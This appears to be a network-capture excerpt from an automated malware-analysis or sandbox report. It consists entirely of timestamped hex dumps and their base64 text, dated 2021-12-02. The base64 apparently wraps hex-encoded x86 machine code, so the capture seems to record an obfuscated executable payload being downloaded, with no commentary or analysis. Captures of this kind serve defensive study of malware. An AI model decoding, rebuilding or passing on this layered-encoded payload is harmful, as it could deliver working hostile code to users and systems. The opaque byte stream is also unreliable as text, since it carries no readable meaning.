                                                                2021-12-02 20:47:22 UTC1223INData Raw: 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 41 73 59 45 4d 32 4c 47 41 34 4e 53 78 67 4d 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 77 4c 47 42 46 4f 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 45 4c 47 41 34 52 43 78 67 4d 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 5a 42 4c 47 41 77 4e 69 78 67 4e 54 45 73 59 45 55 34 4c 47 41 78 4e 53 78 67 52 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 6b 31 4c 47 41 79 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 44 68 45 4c 47 41 31 52 69 78 67 4d 55 4d 73 59 44 55 7a 4c 47 42 46 4f 43 78 67 52 6a 55 73 59 45 49 79 4c 47 42 47 52 69 78 67 52 6b 59 73 59
                                                                Data Ascii: ZGLGBGRixgRkYsYDZBLGAwMCxgNTAsYEM2LGA4NSxgMkMsYEZGLGBGRixgRkYsYDAwLGBFOCxgODMsYEM0LGAwMCxgMDAsYDhELGA4RCxgMkMsYEZGLGBGRixgRkYsYDZBLGAwNixgNTEsYEU4LGAxNSxgRDAsYDAwLGAwMCxgOEQsYDk1LGAyQyxgRkYsYEZGLGBGRixgNTIsYDhELGA1RixgMUMsYDUzLGBFOCxgRjUsYEIyLGBGRixgRkYsY
                                                                2021-12-02 20:47:22 UTC1239INData Raw: 63 31 4c 47 41 32 4f 53 78 67 4e 6a 51 73 59 45 4d 32 4c 47 41 30 4e 53 78 67 52 6a 67 73 59 44 41 77 4c 47 42 46 4f 43 78 67 52 6a 6b 73 59 45 4a 46 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 67 73 59 44 5a 42 4c 47 41 77 4d 53 78 67 4e 6b 45 73 59 44 46 42 4c 47 41 31 4e 69 78 67 52 54 67 73 59 45 56 44 4c 47 42 43 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 55 51 73 59 44 41 34 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 30 4c 47 41 34 52 43 78 67 4f 45 4d 73 59 44 51 33 4c 47 41 32 4f 43 78 67 4d 44 67 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 55 7a 4c 47 42 46 4f 43 78 67 4e 44 67 73 59 45 46 42 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4f 44 4d 73 59
                                                                Data Ascii: c1LGA2OSxgNjQsYEM2LGA0NSxgRjgsYDAwLGBFOCxgRjksYEJFLGAwMCxgMDAsYDgzLGBDNCxgMDgsYDZBLGAwMSxgNkEsYDFBLGA1NixgRTgsYEVDLGBCQSxgMDAsYDAwLGA4QixgNUQsYDA4LGA4MyxgQzQsYDA0LGA4RCxgOEMsYDQ3LGA2OCxgMDgsYDAwLGAwMCxgNTEsYDUzLGBFOCxgNDgsYEFBLGBGRixgRkYsYDMzLGBDMCxgODMsY
                                                                2021-12-02 20:47:22 UTC1255INData Raw: 41 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 42 51 79 78 67 51 6a 67 73 59 44 63 79 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 42 52 53 78 67 51 6a 67 73 59 44 59 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4d 43 78 67 4d 7a 4d 73 59 45 4d 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4d 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4e 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 43 51 79 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 44 4d 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 44 4e 43 78 67 51 6a 67 73 59 44 51 7a 4c 47 41 77 4d 43 78 67 4d 44 41 73 59
                                                                Data Ascii: AwLGA2NixgODksYDQ1LGBBQyxgQjgsYDcyLGAwMCxgMDAsYDAwLGA2NixgODksYDQ1LGBBRSxgQjgsYDYxLGAwMCxgMDAsYDAwLGA2NixgODksYDQ1LGBCMCxgMzMsYEMwLGA2NixgODksYDQ1LGBCMixgODksYDQ1LGBCNCxgODksYDQ1LGBCOCxgODksYDQ1LGBCQyxgODksYDQ1LGBDMCxgODksYDQ1LGBDNCxgQjgsYDQzLGAwMCxgMDAsY
                                                                2021-12-02 20:47:22 UTC1271INData Raw: 55 77 4c 47 42 47 52 69 78 67 52 44 45 73 59 44 68 43 4c 47 41 31 4e 53 78 67 52 6b 4d 73 59 44 5a 42 4c 47 41 77 4d 53 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4e 43 78 67 4f 45 49 73 59 44 67 32 4c 47 42 44 4d 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 49 73 59 45 5a 47 4c 47 42 45 4d 43 78 67 4f 45 49 73 59 44 52 45 4c 47 42 47 51 79 78 67 4f 45 49 73 59 44 6b 32 4c 47 42 44 4e 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 79 4c 47 41 31 4d 53 78 67 4f 45 49 73 59 45 51 34 4c 47 42 47 52 69 78 67 52 44 49 73 59 44 68 43 4c 47 41 34 52 53 78 67 51 7a 67 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 35 4c 47 41 30 4e 53 78 67 52 6a 67 73 59 44 68 43 4c 47 41 30 4e 53 78 67 52 6b 4d 73 59
                                                                Data Ascii: UwLGBGRixgRDEsYDhCLGA1NSxgRkMsYDZBLGAwMSxgODksYDQ1LGBGNCxgOEIsYDg2LGBDMCxgMDEsYDAwLGAwMCxgNTIsYEZGLGBEMCxgOEIsYDRELGBGQyxgOEIsYDk2LGBDNCxgMDEsYDAwLGAwMCxgNkEsYDAyLGA1MSxgOEIsYEQ4LGBGRixgRDIsYDhCLGA4RSxgQzgsYDAxLGAwMCxgMDAsYDg5LGA0NSxgRjgsYDhCLGA0NSxgRkMsY
                                                                2021-12-02 20:47:22 UTC1287INData Raw: 49 30 4c 47 42 44 51 79 78 67 52 44 49 73 59 44 45 78 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 4d 73 59 44 55 32 4c 47 41 34 4f 53 78 67 4e 44 63 73 59 44 46 44 4c 47 42 46 4f 43 78 67 4e 7a 4d 73 59 44 49 30 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 59 34 4c 47 42 43 4f 43 78 67 4f 44 49 73 59 44 51 34 4c 47 42 44 4f 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 55 7a 4c 47 41 31 4e 69 78 67 4f 44 6b 73 59 44 51 33 4c 47 41 79 4d 43 78 67 52 54 67 73 59 44 59 77 4c 47 41 79 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 4e 44 4c 47 41 34 4d 79 78 67 4d 30 59 73 59 44 41 77 4c 47 41 34 4f 53 78 67 4e 44 63 73 59 44 49 30 4c 47 41 33 4e 43 78 67 4e 44 41 73 59
                                                                Data Ascii: I0LGBDQyxgRDIsYDExLGA2QSxgMDAsYDZBLGAwMCxgNTMsYDU2LGA4OSxgNDcsYDFDLGBFOCxgNzMsYDI0LGAwMCxgMDAsYDY4LGBCOCxgODIsYDQ4LGBDOCxgNkEsYDAwLGA2QSxgMDAsYDUzLGA1NixgODksYDQ3LGAyMCxgRTgsYDYwLGAyNCxgMDAsYDAwLGA4MyxgQzQsYDNDLGA4MyxgM0YsYDAwLGA4OSxgNDcsYDI0LGA3NCxgNDAsY
                                                                2021-12-02 20:47:22 UTC1303INData Raw: 55 78 4c 47 41 31 4d 69 78 67 4e 54 63 73 59 45 55 34 4c 47 42 44 52 43 78 67 52 6a 6b 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 4d 43 78 67 4f 45 51 73 59 44 51 31 4c 47 42 47 4f 43 78 67 4e 54 41 73 59 45 5a 47 4c 47 41 31 4e 53 78 67 52 55 4d 73 59 44 51 7a 4c 47 41 34 4d 79 78 67 51 7a 59 73 59 44 45 77 4c 47 41 7a 51 69 78 67 4e 55 51 73 59 45 5a 44 4c 47 41 33 4d 69 78 67 4f 55 4d 73 59 44 68 43 4c 47 41 30 52 43 78 67 52 54 67 73 59 44 55 78 4c 47 42 47 52 69 78 67 4e 54 55 73 59 45 59 30 4c 47 41 31 52 69 78 67 4e 55 55 73 59 45 49 34 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 55 49 73 59 44 68 43 4c 47 42 46 4e 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 31 52 69 78 67 4e 55 55 73 59
                                                                Data Ascii: UxLGA1MixgNTcsYEU4LGBDRCxgRjksYEZGLGBGRixgODMsYEM0LGAyMCxgOEQsYDQ1LGBGOCxgNTAsYEZGLGA1NSxgRUMsYDQzLGA4MyxgQzYsYDEwLGAzQixgNUQsYEZDLGA3MixgOUMsYDhCLGA0RCxgRTgsYDUxLGBGRixgNTUsYEY0LGA1RixgNUUsYEI4LGAwMSxgMDAsYDAwLGAwMCxgNUIsYDhCLGBFNSxgNUQsYEMzLGA1RixgNUUsY
                                                                2021-12-02 20:47:22 UTC1319INData Raw: 49 30 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 55 31 4c 47 42 47 4e 43 78 67 4e 6a 59 73 59 44 68 43 4c 47 41 77 4e 43 78 67 4e 7a 49 73 59 44 59 32 4c 47 42 44 4d 53 78 67 52 54 67 73 59 44 42 44 4c 47 41 77 52 69 78 67 51 6a 63 73 59 45 4d 34 4c 47 41 34 52 43 78 67 4e 54 55 73 59 44 42 44 4c 47 41 31 4d 69 78 67 4f 45 51 73 59 44 51 31 4c 47 42 46 4e 43 78 67 4f 44 6b 73 59 44 52 45 4c 47 41 77 51 79 78 67 4f 45 49 73 59 44 52 45 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 44 55 78 4c 47 42 46 4f 43 78 67 4e 6b 55 73 59 44 68 46 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 51 32 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 42 44 4c 47 41 7a 51 69 78 67 52 6a 63 73 59 44 63 79 4c 47 42 45 4e 69 78 67 4f 45 49 73 59
                                                                Data Ascii: I0LGAwMCxgMDAsYDAwLGAwMCxgOEIsYDU1LGBGNCxgNjYsYDhCLGAwNCxgNzIsYDY2LGBDMSxgRTgsYDBDLGAwRixgQjcsYEM4LGA4RCxgNTUsYDBDLGA1MixgOEQsYDQ1LGBFNCxgODksYDRELGAwQyxgOEIsYDRELGAwOCxgNTAsYDUxLGBFOCxgNkUsYDhFLGAwMCxgMDAsYDQ2LGA4MyxgQzQsYDBDLGAzQixgRjcsYDcyLGBENixgOEIsY
                                                                2021-12-02 20:47:22 UTC1335INData Raw: 67 34 4c 47 41 35 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 55 73 59 45 49 34 4c 47 41 77 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 43 78 67 4f 45 51 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4e 6b 45 73 59 44 41 30 4c 47 41 31 4d 43 78 67 4f 44 6b 73 59 44 55 31 4c 47 41 77 4f 43 78 67 52 54 67 73 59 44 42 44 4c 47 41 31 52 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 51 69 78 67 4e 44 55 73 59 44 41 34 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 42 44 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 44 5a 43 4c 47 41 79 4f 53 78 67 4d 6b 4d 73 59 44 49 79 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 34 4d 53 78 67 52 55 4d 73 59 44 41 30 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4e 69 78 67 4e 54 63 73 59
                                                                Data Ascii: g4LGA5NCxgMDAsYDAwLGAwMCxgMDUsYEI4LGAwNCxgMDAsYDAwLGA1MCxgOEQsYDQ1LGAwOCxgNkEsYDA0LGA1MCxgODksYDU1LGAwOCxgRTgsYDBDLGA1RSxgRkYsYEZGLGA4QixgNDUsYDA4LGA4MyxgQzQsYDBDLGA1RCxgQzMsYDZCLGAyOSxgMkMsYDIyLGA1NSxgOEIsYEVDLGA4MSxgRUMsYDA0LGAwMSxgMDAsYDAwLGA1NixgNTcsY
                                                                2021-12-02 20:47:22 UTC1343INData Raw: 41 77 4c 47 41 31 4d 69 78 67 4f 45 51 73 59 44 51 31 4c 47 42 47 51 79 78 67 4e 6b 45 73 59 44 41 30 4c 47 41 31 4d 43 78 67 4f 44 6b 73 59 44 52 45 4c 47 42 47 51 79 78 67 52 54 67 73 59 44 45 31 4c 47 41 31 4f 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 51 69 78 67 4e 45 51 73 59 45 5a 44 4c 47 41 31 4e 79 78 67 4e 6b 45 73 59 44 41 31 4c 47 41 32 51 53 78 67 4e 7a 63 73 59 44 55 78 4c 47 42 46 4f 43 78 67 51 54 63 73 59 44 63 30 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 55 4d 73 59 44 55 33 4c 47 41 31 4e 69 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4e 43 78 67 4d 54 4d 73 59 45 55 34 4c 47 42 44 4f 53 78 67 4e 6a 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 55 59 73 59
                                                                Data Ascii: AwLGA1MixgOEQsYDQ1LGBGQyxgNkEsYDA0LGA1MCxgODksYDRELGBGQyxgRTgsYDE1LGA1OCxgRkYsYEZGLGA4QixgNEQsYEZDLGA1NyxgNkEsYDA1LGA2QSxgNzcsYDUxLGBFOCxgQTcsYDc0LGAwMCxgMDAsYDgzLGBDNCxgMUMsYDU3LGA1NixgODUsYEMwLGA3NCxgMTMsYEU4LGBDOSxgNjksYDAwLGAwMCxgODMsYEM0LGAwOCxgNUYsY
                                                                2021-12-02 20:47:22 UTC1359INData Raw: 63 31 4c 47 41 78 51 79 78 67 4f 45 49 73 59 44 52 46 4c 47 41 77 4f 43 78 67 4e 6a 67 73 59 44 55 79 4c 47 41 78 4d 69 78 67 4d 6a 51 73 59 45 51 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 67 7a 4c 47 42 44 4e 79 78 67 4d 55 4d 73 59 44 55 33 4c 47 42 46 4f 43 78 67 4e 6b 51 73 59 45 56 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59 44 67 35 4c 47 41 30 4e 69 78 67 4e 44 51 73 59 44 56 47 4c 47 41 31 52 53 78 67 4f 45 49 73 59 45 55 31 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 45 4e 44 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 34 4d 79 78 67 52 55 4d 73 59 44 41 34 4c 47 41 31 4d 79 78 67 4f 45 49 73 59 44 56 45 4c 47 41 77 4f 43 78 67 4e 54 59 73 59
                                                                Data Ascii: c1LGAxQyxgOEIsYDRFLGAwOCxgNjgsYDUyLGAxMixgMjQsYEQwLGA2QSxgMDAsYDZBLGAwMCxgNTEsYDgzLGBDNyxgMUMsYDU3LGBFOCxgNkQsYEVFLGBGRixgRkYsYDgzLGBDNCxgMTQsYDg5LGA0NixgNDQsYDVGLGA1RSxgOEIsYEU1LGA1RCxgQzMsYENDLGA1NSxgOEIsYEVDLGA4MyxgRUMsYDA4LGA1MyxgOEIsYDVELGAwOCxgNTYsY
                                                                2021-12-02 20:47:22 UTC1375INData Raw: 56 43 4c 47 41 7a 52 69 78 67 52 6a 49 73 59 44 45 34 4c 47 42 44 4d 43 78 67 4e 45 4d 73 59 45 46 45 4c 47 42 47 4d 79 78 67 4f 44 4d 73 59 45 49 78 4c 47 41 32 4e 53 78 67 4d 54 49 73 59 44 45 31 4c 47 41 30 52 43 78 67 4d 44 51 73 59 44 52 44 4c 47 42 45 51 69 78 67 4e 54 67 73 59 44 68 43 4c 47 41 34 4d 53 78 67 4d 7a 55 73 59 44 63 32 4c 47 41 34 52 53 78 67 4e 54 49 73 59 45 55 77 4c 47 42 47 4d 53 78 67 4d 45 49 73 59 45 51 35 4c 47 41 34 4e 79 78 67 4e 6a 67 73 59 45 5a 44 4c 47 41 7a 4d 79 78 67 4e 30 4d 73 59 45 52 46 4c 47 42 46 4f 43 78 67 4d 6b 51 73 59 44 4a 46 4c 47 42 47 4e 43 78 67 4d 30 4d 73 59 44 4a 47 4c 47 41 78 4d 79 78 67 4d 6a 67 73 59 45 45 34 4c 47 42 46 4f 53 78 67 4e 55 45 73 59 44 64 47 4c 47 41 31 4e 43 78 67 51 55 55 73 59
                                                                Data Ascii: VCLGAzRixgRjIsYDE4LGBDMCxgNEMsYEFELGBGMyxgODMsYEIxLGA2NSxgMTIsYDE1LGA0RCxgMDQsYDRDLGBEQixgNTgsYDhCLGA4MSxgMzUsYDc2LGA4RSxgNTIsYEUwLGBGMSxgMEIsYEQ5LGA4NyxgNjgsYEZDLGAzMyxgN0MsYERFLGBFOCxgMkQsYDJFLGBGNCxgM0MsYDJGLGAxMyxgMjgsYEE4LGBFOSxgNUEsYDdGLGA1NCxgQUUsY
                                                                2021-12-02 20:47:22 UTC1391INData Raw: 51 31 4c 47 41 33 4f 53 78 67 51 6b 55 73 59 44 4e 43 4c 47 41 33 4d 43 78 67 52 6a 55 73 59 44 49 31 4c 47 41 33 4e 69 78 67 4d 6b 55 73 59 44 67 35 4c 47 42 44 4d 79 78 67 4d 54 49 73 59 44 59 34 4c 47 41 35 52 69 78 67 51 55 49 73 59 44 68 44 4c 47 41 79 4d 53 78 67 4f 44 55 73 59 44 41 78 4c 47 41 34 4d 43 78 67 51 54 51 73 59 45 56 47 4c 47 41 35 4f 53 78 67 4d 7a 41 73 59 45 4d 7a 4c 47 41 35 51 79 78 67 51 54 49 73 59 44 55 33 4c 47 41 34 51 79 78 67 4e 6a 4d 73 59 44 46 44 4c 47 41 32 52 53 78 67 4e 6a 4d 73 59 45 45 30 4c 47 41 31 4e 43 78 67 52 55 51 73 59 44 56 46 4c 47 42 45 4d 79 78 67 51 55 59 73 59 44 67 35 4c 47 42 44 4e 53 78 67 51 7a 41 73 59 44 45 78 4c 47 42 43 4d 69 78 67 4e 6b 49 73 59 44 63 31 4c 47 41 30 4e 79 78 67 4d 55 4d 73 59
                                                                Data Ascii: Q1LGA3OSxgQkUsYDNCLGA3MCxgRjUsYDI1LGA3NixgMkUsYDg5LGBDMyxgMTIsYDY4LGA5RixgQUIsYDhDLGAyMSxgODUsYDAxLGA4MCxgQTQsYEVGLGA5OSxgMzAsYEMzLGA5QyxgQTIsYDU3LGA4QyxgNjMsYDFDLGA2RSxgNjMsYEE0LGA1NCxgRUQsYDVFLGBEMyxgQUYsYDg5LGBDNSxgQzAsYDExLGBCMixgNkIsYDc1LGA0NyxgMUMsY
                                                                2021-12-02 20:47:22 UTC1407INData Raw: 5a 47 4c 47 41 31 4d 79 78 67 4e 54 45 73 59 44 67 34 4c 47 41 31 52 43 78 67 52 45 4d 73 59 44 67 35 4c 47 41 30 4e 53 78 67 52 44 67 73 59 44 59 32 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 44 41 34 4c 47 41 77 52 43 78 67 4d 45 45 73 59 44 67 34 4c 47 41 31 52 43 78 67 4d 45 45 73 59 45 4d 33 4c 47 41 30 4e 53 78 67 52 6a 41 73 59 44 55 77 4c 47 41 32 52 69 78 67 4e 7a 49 73 59 44 63 30 4c 47 41 32 4e 69 78 67 51 7a 63 73 59 44 51 31 4c 47 42 47 4e 43 78 67 4d 30 45 73 59 44 41 35 4c 47 41 34 4f 43 78 67 4e 55 51 73 59 45 59 32 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 59 34 4c 47 41 31 4e 53 78 67 4e 7a 4d 73 59 44 59 31 4c 47 41 33 4d 69 78 67 51 7a 63 73 59 44 51 31 4c 47 42 47 51 79 78 67 4d 6a 41 73 59 44 4e 42 4c 47 41 77 4f 53 78 67 4d 44 41 73 59
                                                                Data Ascii: ZGLGA1MyxgNTEsYDg4LGA1RCxgREMsYDg5LGA0NSxgRDgsYDY2LGBDNyxgNDUsYDA4LGAwRCxgMEEsYDg4LGA1RCxgMEEsYEM3LGA0NSxgRjAsYDUwLGA2RixgNzIsYDc0LGA2NixgQzcsYDQ1LGBGNCxgM0EsYDA5LGA4OCxgNUQsYEY2LGBDNyxgNDUsYEY4LGA1NSxgNzMsYDY1LGA3MixgQzcsYDQ1LGBGQyxgMjAsYDNBLGAwOSxgMDAsY
                                                                2021-12-02 20:47:22 UTC1423INData Raw: 41 77 4c 47 41 34 51 69 78 67 52 44 67 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 7a 41 73 59 44 67 31 4c 47 42 45 51 69 78 67 4d 45 59 73 59 44 67 30 4c 47 41 35 4e 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 78 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 68 45 4c 47 41 31 4e 53 78 67 51 7a 41 73 59 44 55 79 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 67 33 4c 47 41 33 4d 43 78 67 4d 30 4d 73 59 44 52 47 4c 47 41 77 4d 43 78 67 4e 54 41 73 59 44 68 45 4c 47 41 30 52 43 78 67 52 6a 51 73 59 44 55 78 4c 47 41 31 4d 79 78 67 4e 54 59 73 59 45 55 34 4c 47 41 33 4f 53 78 67 4d 55 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 4e 43 78 67 4f 44 6b 73 59
                                                                Data Ascii: AwLGA4QixgRDgsYDgzLGBDNCxgMzAsYDg1LGBEQixgMEYsYDg0LGA5NixgMDAsYDAwLGAwMCxgNkEsYDAxLGA2QSxgMDAsYDhELGA1NSxgQzAsYDUyLGA2QSxgMDAsYDZBLGAwMCxgOEQsYDg3LGA3MCxgM0MsYDRGLGAwMCxgNTAsYDhELGA0RCxgRjQsYDUxLGA1MyxgNTYsYEU4LGA3OSxgMUEsYDAwLGAwMCxgODMsYEM0LGAyNCxgODksY
                                                                2021-12-02 20:47:22 UTC1439INData Raw: 45 30 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 41 78 4e 43 78 67 4f 45 49 73 59 44 52 45 4c 47 42 47 51 79 78 67 4e 54 45 73 59 44 55 7a 4c 47 42 46 4f 43 78 67 52 54 59 73 59 44 49 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 67 73 59 44 56 47 4c 47 41 31 52 53 78 67 4e 55 49 73 59 44 68 43 4c 47 42 46 4e 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 32 51 53 78 67 4d 44 51 73 59 44 68 45 4c 47 41 30 4e 53 78 67 52 45 4d 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 59 73 59 44 41 78 4c 47 41 34 52 43 78 67 4e 54 63 73 59 44 45 79 4c 47 41 31 4d 53 78 67 51 7a 63 73 59 44 51 31 4c 47 42 45 51 79 78 67 4d 6a 4d 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 35 4c 47 41 31 4e 53 78 67 52 44 67 73 59
                                                                Data Ascii: E0LGA4NSxgQzAsYDc1LGAxNCxgOEIsYDRELGBGQyxgNTEsYDUzLGBFOCxgRTYsYDIxLGAwMCxgMDAsYDgzLGBDNCxgMDgsYDVGLGA1RSxgNUIsYDhCLGBFNSxgNUQsYEMzLGA2QSxgMDQsYDhELGA0NSxgREMsYDUwLGA4RCxgNEYsYDAxLGA4RCxgNTcsYDEyLGA1MSxgQzcsYDQ1LGBEQyxgMjMsYDAwLGAwMCxgMDAsYDg5LGA1NSxgRDgsY
                                                                2021-12-02 20:47:22 UTC1455INData Raw: 51 35 4c 47 42 47 4f 43 78 67 4e 54 67 73 59 44 4d 78 4c 47 41 79 51 53 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 67 34 4c 47 41 78 4f 43 78 67 4d 45 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 44 5a 42 4c 47 41 30 4e 69 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 53 78 67 4f 45 51 73 59 45 49 77 4c 47 41 34 51 79 78 67 4d 45 4d 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 44 55 77 4c 47 42 46 4f 43 78 67 4e 7a 45 73 59 44 41 33 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 31 4e 53 78 67 4d 54 51 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 54 41 73 59 44 68 43 4c 47 41 30 52 43 78 67 4d 45 4d 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59
                                                                Data Ascii: Q5LGBGOCxgNTgsYDMxLGAyQSxgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgOEIsYDg4LGAxOCxgMEEsYDAwLGAwMCxgNTYsYDZBLGA0NixgNkEsYDAwLGA1MSxgOEQsYEIwLGA4QyxgMEMsYDAwLGAwMCxgNTYsYDUwLGBFOCxgNzEsYDA3LGAwMCxgMDAsYDhCLGA1NSxgMTQsYDhCLGA0NSxgMTAsYDhCLGA0RCxgMEMsYDgzLGBDNCxgMTQsY
                                                                2021-12-02 20:47:22 UTC1471INData Raw: 68 43 4c 47 42 46 4e 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 42 44 51 79 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4e 54 45 73 59 44 59 30 4c 47 42 42 4d 53 78 67 4d 54 67 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 35 4c 47 41 30 4e 53 78 67 52 6b 4d 73 59 44 68 43 4c 47 41 30 4e 53 78 67 52 6b 4d 73 59 44 68 43 4c 47 41 34 4d 43 78 67 51 7a 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 42 46 4e 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 79 4d 43 78 67 4d 44 63 73 59 44 41 33 4c 47 42 45 51 53 78 67 4d 55 49 73 59 44 6c 45 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 31 4d 53 78 67 4e 6a 51 73 59 45 45 78 4c 47 41 78 4f 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59
                                                                Data Ascii: hCLGBFNSxgNUQsYEMzLGBDQyxgNTUsYDhCLGBFQyxgNTEsYDY0LGBBMSxgMTgsYDAwLGAwMCxgMDAsYDg5LGA0NSxgRkMsYDhCLGA0NSxgRkMsYDhCLGA4MCxgQzAsYDAwLGAwMCxgMDAsYDhCLGBFNSxgNUQsYEMzLGAyMCxgMDcsYDA3LGBEQSxgMUIsYDlELGA1NSxgOEIsYEVDLGA1MSxgNjQsYEExLGAxOCxgMDAsYDAwLGAwMCxgOEIsY
                                                                2021-12-02 20:47:22 UTC1487INData Raw: 46 46 4c 47 42 44 51 53 78 67 52 44 45 73 59 44 55 35 4c 47 42 45 4e 69 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 51 34 4c 47 41 77 4f 43 78 67 4e 54 59 73 59 44 55 33 4c 47 41 34 51 69 78 67 4e 30 51 73 59 44 42 44 4c 47 41 77 4d 79 78 67 52 6b 59 73 59 44 55 33 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 55 78 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 51 32 4c 47 42 46 4e 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 51 69 78 67 52 6a 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 41 73 59 44 67 31 4c 47 42 47 4e 69 78 67 4e 7a 51 73 59 44 45 79 4c 47 41 34 4e 53 78 